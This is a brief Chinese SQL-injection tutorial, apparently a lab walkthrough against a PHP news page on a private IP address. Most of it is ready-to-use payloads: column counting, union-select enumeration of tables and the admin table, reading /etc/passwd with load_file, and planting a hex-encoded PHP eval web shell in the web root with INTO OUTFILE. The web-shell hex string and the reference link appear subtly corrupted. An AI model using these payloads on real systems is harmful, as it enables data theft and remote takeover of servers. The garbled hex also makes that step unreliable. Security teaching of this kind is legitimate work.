时间:2021-07-01 10:21:17 帮助过:2人阅读
数据库内容
0x02注入测试
1. 正常访问
http://192.168.192.128/sqltest/news.php?id=1 http://192.168.192.128/sqltest/news.php?id=2
...
2. 测试字段数
PS:3 正常,4报错,说明有三个字段
http://192.168.192.128/sqltest/news.php?id=1 and 1=2 order by 4
3. 测试回显字段
PS: 2,3均回显,说明均是回显字段
例如,在3字段测试user()函数
4. 查询当前库下的所有表
192.168.192.128/sqltest/news.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
5.测试表中的字段名称
PS:admin 的十六进制61646d696e ; news十六进制 6e657773
192.168.192.128/sqltest/news.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x61646d696e
6.查询admin表下的用户名密码
7.读取linux系统文件(/etc/passwd,需转换为16进制)
ps:权限足够
192.168.192.128/sqltest/news.php?id=-1 union select 1,2,load_file(0x2f6574632f706173737764)
8. 权限足够的情况下写SHELL
192.168.192.128/sqltest/news.php?id=-1 union select 1,2,0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile ‘/var/www/html/1.php‘--
执行完毕不报错
另外,注入写入的文件可能root删除不掉,需要结合chattr 来解决。(攻防比赛中,可能会遇到)
参考:
http://mp.weixin.qq.com/s?src=3×tamp=1469346783&ver=1&signature=JFsK7nVvnj9R0JHq1j-KXdP159o764mHQ8guzfVPPdAjpPhsZEFyqhJFvvdWchcJy*PfAGY4pe2KBkVJI4-X6kHovCMWCubqcpDZ7W3FmRbZoRGsFOC2zcXEaNaO2no3tRTJokL9h-s-yLq7kQWxvx7cCEcEjW6rdqaWTwcneMI=
代码审计之SQL注入
标签: